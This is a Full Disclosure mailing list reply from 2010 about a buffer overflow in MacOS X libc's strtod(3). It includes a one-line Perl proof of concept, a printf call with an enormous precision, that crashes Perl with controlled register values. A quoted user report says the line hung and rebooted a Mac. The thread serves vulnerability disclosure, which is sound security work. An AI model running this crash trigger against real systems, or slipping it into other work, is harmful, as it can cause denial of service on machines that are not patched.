Full Disclosure mailing list archives
Re: MacOS X 10.5/10.6 libc/strtod(3) buffer overflow
From: Maksymilian Arciemowicz <cxib () securityreason com>
Date: Mon, 11 Jan 2010 20:46:21 +0100
I have not checked this issue in macos 10.4. In MacOS 10.1 does not work. But the perl script (in macos 10.5) Chujwamwmuzg.pl --- #!/usr/local/bin/perl printf "% 0.4194310f, 0x0.0x41414141; Chujwamwmuzg.pl --- will crash with esi = 0x41414141 edi = 0x15 Other bugs in libc also work on new versions of macos. Example overflow in FTSENT structure http://securityreason.com/achievement_securityalert/60 http://securityreason.com/achievement_securityalert/68 We confirmed this issue in MacOS 10.1.
Joshua Levitsky wrote: and it then rebooted my mac :) On Mon, Jan 11, 2010 at 1:57 PM, Joshua Levitsky <jlevitsk () joshie com <mailto:jlevitsk () joshie com>> wrote: The below hosed my terminal session on 10.4.11... I did this in a >console login so don't have the results.. You need? or is dropping me to a blue screen and lack of system response good? #!/usr/local/bin/perl printf "%0.4194310f", 0x0.0x41414141; Perl will crash with esi = 0x41414141 edi = 0x15 -Josh
-- Best Regards, ------------------------ pub 1024D/A6986BD6 2008-08-22 uid Maksymilian Arciemowicz (cxib) <cxib () securityreason com> sub 4096g/0889FA9A 2008-08-22 http://securityreason.com http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
Attachment:
signature.asc
Description: OpenPGP digital signature
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- MacOS X 10.5/10.6 libc/strtod(3) buffer overflow Maksymilian Arciemowicz (Jan 08)
- Re: MacOS X 10.5/10.6 libc/strtod(3) buffer overflow Joshua Levitsky (Jan 11)
- Re: MacOS X 10.5/10.6 libc/strtod(3) buffer overflow Maksymilian Arciemowicz (Jan 11)
- Re: MacOS X 10.5/10.6 libc/strtod(3) buffer overflow Joshua Levitsky (Jan 12)
- Message not available
- Message not available
- Message not available
- Re: MacOS X 10.5/10.6 libc/strtod(3) buffer overflow Maksymilian Arciemowicz (Jan 11)
- Re: MacOS X 10.5/10.6 libc/strtod(3) buffer overflow Maksymilian Arciemowicz (Jan 11)
- Re: MacOS X 10.5/10.6 libc/strtod(3) buffer overflow Joshua Levitsky (Jan 11)